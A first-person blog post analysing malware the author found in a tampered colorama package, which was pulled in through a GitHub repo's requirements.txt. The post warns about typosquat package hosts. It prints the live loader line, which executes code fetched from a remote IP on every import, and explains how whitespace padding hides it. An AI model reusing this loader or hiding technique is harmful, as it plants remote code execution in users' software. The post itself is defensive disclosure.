Discovering malwares in public GitHub repositories
I trust this article finds you in good spirits. Let’s forgo the formalities of introductions and dive straight into the subject at hand.
I was using my laptop today, just the regular messing around with python and other stuff on my command line, until I seen a weird message on my command line saying that there’s something wrong with colorama on python, I didn’t care much cause I’m used to this stuff so I just skipped it, Few minutes later I got the same error message but in a different script I’m using, The error message was like this
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "C:\Users\demonia\AppData\Local\Programs\Python\Python312\Lib\site-packages\colorama\__init__.py", line 6, in <module>
__version__ = '0.4.3' ;exec(__import__('requests').get('http://144.172.67.49/version').text)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "<string>", line 1
<html>
^
SyntaxError: invalid syntax
The moment I seen this I knew what’s going on, I got hacked, But how did it happen? I had no idea, So I started my analysis
I started by opening C:\Users\demonia\AppData\Local\Programs\Python\Python312\Lib\site-packages\colorama\__init__.py @ Visual studio code, and I seen nothing! It literally looked like this
Until I noticed the scroll-bar on the code editor below, I kept scrolling and found a code being pushed by spaces to the end of the page so it won’t be noticed, it was just like this
So let’s break down the malicious code, The hacker is using the __import__ function on python to import requests library, then send a GET request to http://144.172.67.49/version, then take the text attribute from the requests object, while all of that is wrapped around an exec function, The attacker is able to execute dynamic remote python code on the victim machine every single time colorama is being imported, Like just being imported you don’t have to use colorama in your code for the exploit to work, because the malware exists in __init__.py it’s going to get executed no matter if you use it, or not.
I decided to dig deep into the server where the malware is hosted, It turned out that the IP address do belong to GalaxyGate, but it turned out that GalaxyGate is just a VPS provider, nothing crazy about it, they give people servers and they host whatever content they want on it, But we definitely know for sure it’s one of GalaxyGate users hosting this malware
After all of this, I didn’t really figure out where I did get infected by this malware, So I checked every single repository and project I installed or used pip inside of it, And I noticed something weird, I recently downloaded https://github.com/maleduque/Valorant-Checker and checking the requiremnts.txt file I found this
And I knew for sure that’s the reason I got the malware the moment I seen the version, The colorama version matches the ones I got with the malware in it, I tried to visit the package that had the malware, but it seems like it got deleted, I have no idea if pypihosted or pythonhosted is owned by the guy spreading the malware, But it seems like it’s not cause the malware got deleted, Maybe someone noticed it? I have no idea
After I did all of that, there’s only one thing left to do now, Find the other places where this malware is hosted and expose the accounts spreading this malware, So I did a simple GitHub query searching for pypihosted.org and I ended up with 9 results
So here’s a list of the repos that contained the malware inside of it before, If you downloaded any of those repos or any other repos from those users maintaining the repos with the malware inside of it, please make sure to check your system
Well, the point of this article is always check the repo before downloading anything, and never trust content hosted on pypihosted.org or pythonhosted.org, either it’s hosted on pypi or it’s a malware, shoutout for my boy flexeando for hosting the malware though, it’s really smart of him to follow himself and 2 accounts mentioning him in their bio in the account he’s using to spread the malware
I hope you enjoyed this article anyways, have a great day and stay safe!